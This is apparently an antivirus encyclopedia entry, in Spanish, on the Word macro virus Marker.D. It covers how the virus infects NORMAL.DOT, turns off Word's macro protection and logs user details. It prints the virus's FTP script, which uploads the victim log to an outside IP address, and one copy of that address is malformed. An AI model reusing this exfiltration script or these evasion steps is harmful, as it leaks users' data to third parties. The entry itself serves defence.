|
Efectos:
Marker.D produce los siguientes efectos: - Infecta la plantilla global de Word (archivo NORMAL.DOT).
- Desactiva las siguientes opciones de macro en el menú Herramientas: Macros, Grabar nueva macro y Editor de Visual Basic.
- Crea un archivo en en el que registra todas las infecciones que realiza en el ordenador.
- Envía este archivo via FTP.
Metodo de infección:
Marker.D crea los siguientes archivos: - HFSXxxxx.SYS, en el directorio raíz del disco duro, donde guarda un listado con datos sobre cada una las infecciones que realiza. Los caracteres xxxx corresponden a cuatro dígitos escogidos por Marker.D al azar. Este archivo es enviado mediante FTP a un servidor cuya dirección es 209.201.883110.
- NETLDX.VXD , en el directorio raíz del disco duro. Este archivo contiene un script que abre una conexión de FTP (si el ordenador está conectado a Internet), con unos parámetros establecidos por defecto. El script o código es el siguiente:
o 209.201.88.110
open the IP address user anonymous
;attempt to log in as an anonymous user pass itsme@
;send a generic anonymous password along cd incoming
;change to directory: "incoming" ascii ;set file transfer
type to ASCII put HSFXnnnn
;upload the victim log file quit
;exit ftp client
Marker.D crea la siguiente entrada en el Registro de Windows: - HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\Use Info
LogUploaded.
Con esta entrada Marker.D consigue enviar el archivo HFSXxxxx.SYS através de FTP. Esto ocurrirá si la fecha del sistema coincide con el primer día del mes y el ordenador está conectado a Internet.
Marker.D contiene una macro de infección denominada DOCUMENT_CLOSE(). Dicha macro, se activa cuando se cierra un documento de Word ya infectado. Marker.D realiza la siguiente rutina: - Comprueba si se cumplen ciertas condiciones antes de infectar la plantilla global o el documetno activo (sólo infectará uno de estos dos elementos).
- Desactiva la protección antivirus que Word tiene asignada para las macros. Así, evita que el usuario deshabilite las macros contenidas en los documentos infectados.
- Desactiva las siguientes opciones de macro del menú Herramientas: Macros, Grabar nueva macro y Editor de Visual Basic.
- Inserta cuatro retornos de carro y tres líneas de comentarios en la plantilla NORMAL.DOT. Estas líneas contienen la siguiente información:
- Nombre de ususario.
- Dirección del usuario.
- Hora y fecha de infección. - Comprueba la fecha del sistema, y si coincide con el primer día del mes, Marker.D asigna el valor True a la entrada mencionada con anterioridad, para envíar el archivo HFSXxxxx.SYS. Si la fecha coincide con cualquier otro día, Marker.D asigna a esta entrada el valor False, por lo que no se enviará el archivo en cuestión.
Metodo de propagación:
Marker.D se propaga mediante documentos de Word ya infectados, así como la plantilla NORMAL.DOT, ya que cada uno de ellos incluyen las macros que el virus contiene.
Para ello Marker.D se propaga mediante los medios empleados habitualmente por este tipo de virus e incluyen, entre otros, disquetes, CD-ROMs, mensajes de correo electrónico con ficheros adjuntos, descargas de Internet, transferencia de ficheros a través de FTP, canales IRC, redes de intercambio de ficheros punto a punto (P2P), etc. Otros detalles:
Marker.D contiene la siguiente cadena de texto en su código de infección:
<- this is a marker!
Logfile --> |
